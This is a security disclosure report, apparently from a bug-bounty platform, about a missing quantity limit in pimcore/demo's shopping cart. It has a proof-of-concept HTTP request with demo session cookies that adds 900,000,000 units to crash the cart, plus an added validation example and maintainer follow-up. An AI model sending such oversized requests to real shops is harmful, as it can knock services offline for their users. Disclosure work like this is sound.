Business Logic Errors in pimcore/demo
Reported on
Oct 29th 2021
Description
There is no check on the number of items that a user can add to the cart. Adding a huge number of items when updating the cart causes the server to fail, returning a 500 Internal Server Error.
Proof of Concept
The POST request below causes the server to fail (it adds 900000000 units of the same product). After this request, users can no longer see the cart (they receive a 500 Internal Server Error).
POST /en/cart HTTP/1.1
Host: demo.pimcore.fun
Cookie: _pc_vis=120b166ae122a7b3; _pc_ses=1635515753969; PHPSESSID=9f6ea63a476c11cbf71a922ec72492d2; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MzU1MTU3MDEuNzA2MDIsInB0ZyI6eyJfbSI6MSwiX2MiOjE2MzU1MTU1OTcsIl91IjoxNjM1NTE1NzAxLCJ2aTpzcnUiOls3LDFdfSwiZXhwIjoxNjM1NTE3NTAxfQ.dveL3XuGf66wRk59wnA7yMrSuRWPFnEmHuJK4SXDWyY; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MzU1MTU3MDEuNzA2MjYxLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MSwiMTAwNyI6MX0sIl9jIjoxNjM1NTE1NTk3LCJfdSI6MTYzNTUxNTYyOSwidGciOltdfSwiZXhwIjoxNjY3MDUxNzAxfQ.SvwP5gneI2doHDVbtLL1A1TtgZYPc_lu6t3y1FNpi-M
Content-Length: 24
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://demo.pimcore.fun
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.pimcore.fun/en/cart
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9
Connection: close
items%5B235%5D=900000000
Impact
Not a huge impact in terms of security at the moment, but together with a CSRF vulnerability, it would be possible to generate a DoS attack.
Mitigation
The application should set a maximum amount of items that can be added to the cart.
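A bounds check of the kind the mitigation describes, as an added example that is not part of the report or of pimcore/demo (written in Python rather than the project's PHP; the limits, field pattern and function names are illustrative assumptions). It parses the same items[<id>]=<qty> form body shown in the PoC and answers 400 instead of letting an oversized quantity reach the cart.

```python
"""Added example (not Pimcore's code): validate cart quantities from a
form-encoded body like the one in the PoC before touching the cart.

Assumptions (not from the report): MAX_QTY_PER_ITEM and MAX_ITEMS_IN_CART
are illustrative limits; a real shop sets them per product and business rule.
"""
import re
from urllib.parse import parse_qsl

MAX_QTY_PER_ITEM = 100      # assumed cap on units of one product
MAX_ITEMS_IN_CART = 500     # assumed cap on total units across the cart

ITEM_KEY = re.compile(r"^items\[(\d+)\]$")   # matches the decoded key items[235]


class CartValidationError(ValueError):
    """Client error: the handler maps it to HTTP 400 instead of a 500."""


def parse_cart_update(body: str) -> dict[int, int]:
    """Parse 'items[<id>]=<qty>&...' into {product_id: qty}, enforcing bounds."""
    parsed: dict[int, int] = {}
    total = 0
    for key, raw in parse_qsl(body, keep_blank_values=True, strict_parsing=True):
        m = ITEM_KEY.match(key)
        if not m:
            raise CartValidationError(f"unexpected field {key!r}")
        product_id = int(m.group(1))
        # Only ASCII digits: rejects '', '-1', '+5', '1e9', '10.0' before int().
        if not (raw.isascii() and raw.isdigit()):
            raise CartValidationError(f"quantity for {product_id} is not a non-negative integer")
        qty = int(raw)
        if qty > MAX_QTY_PER_ITEM:
            raise CartValidationError(f"quantity {qty} for {product_id} exceeds {MAX_QTY_PER_ITEM}")
        total += qty
        if total > MAX_ITEMS_IN_CART:
            raise CartValidationError(f"cart total would exceed {MAX_ITEMS_IN_CART}")
        parsed[product_id] = qty        # qty 0 means 'remove this line'
    return parsed


def handle_cart_post(body: str) -> tuple[int, str]:
    """Return (status, message) the way a controller would, never a 500 for bad input."""
    try:
        items = parse_cart_update(body)
    except ValueError as e:             # CartValidationError and malformed-body errors
        return 400, str(e)
    return 200, f"updated {len(items)} line(s)"
```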
Hi @admin, has this report been notified to the maintainers? I don't see the usual acknowledgement of the notification. Thanks!
@lfama - the outreach process has been recently adjusted - but rest assured, e-mails will be sent out to the maintainers within 24 hours of your original disclosure time.
The maintainers will be notified today of your report.
Cheers!
No worries, we rolled out this change last night but will make it clearer with follow-up improvements on the platform this week.
Thanks for reporting the issue! Just wanted to let you know that we're aware of the issue and we're planning to fix that soon. Since it's not a critical thing (it's a demo), it doesn't have the highest priority as of now.
https://github.com/pimcore/demo/issues/262
Hi,
This is fixed in pimcore/demo, not in pimcore/pimcore. Please find the fix commit here: https://github.com/pimcore/demo/commit/b1c1c51fa0ddfc33dbc2ac7cd161550359252669.
Thanks, Divesh
Hi Divesh,
Thank you for the update. @admin, I think in this case I should report the disclosure for the other repository; can you please let me know? Thanks
Hello all 👋
We can adjust the repository here, but for clarity, we will need to adjust the bounties as well.
Furthermore, we may revoke the CVE as well, as it looks like this report is against a demo library.
Please confirm if you are happy with this, and I will arrange the switch for you 👍
Hi Jamie,
Sure, it's fine for me. I wasn't aware that the issue was related only to the demo repo.
Thanks!
Hello Jamie,
I'm also fine with the switch. Thanks for your help!